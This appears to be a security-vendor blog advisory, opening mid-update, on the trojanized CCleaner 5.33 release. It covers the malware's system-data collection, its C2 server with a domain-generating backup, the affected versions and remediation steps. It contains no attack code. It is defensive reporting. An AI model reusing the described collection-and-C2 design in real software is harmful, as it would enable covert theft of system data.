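Any non-empty result means the trojanized installer ran at least far enough to write its identifiers, which, as noted above, it did on 64-bit systems too even though the second stage only executed on 32-bit Windows; those hosts still belong in the reimaging queue, and the values themselves are worth preserving as evidence before removal.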

Original post:

In a supply chain attack that may be unprecedented in the number of downloads, the servers hosting CCleaner, a popular tool for cleaning up the PC, have been delivering a version of the software laced with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.


Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. According to statistics published by Piriform, CCleaner has been downloaded 2 billion times in total, and 5 million times every week. The modified version, 5.33, was available from August 15 until September 12, when version 5.34 was released. In a press statement the company estimates that 2.27 million people used the affected software.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server and a domain generating algorithm (DGA) as a backup, to send information about the affected system and fetch the final payload.


What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.

Detection and Protection

 

CCleaner users that are running older versions or that do not trust the one they are using now are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!

 

Pieter Arntz

The post [Updated] Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.

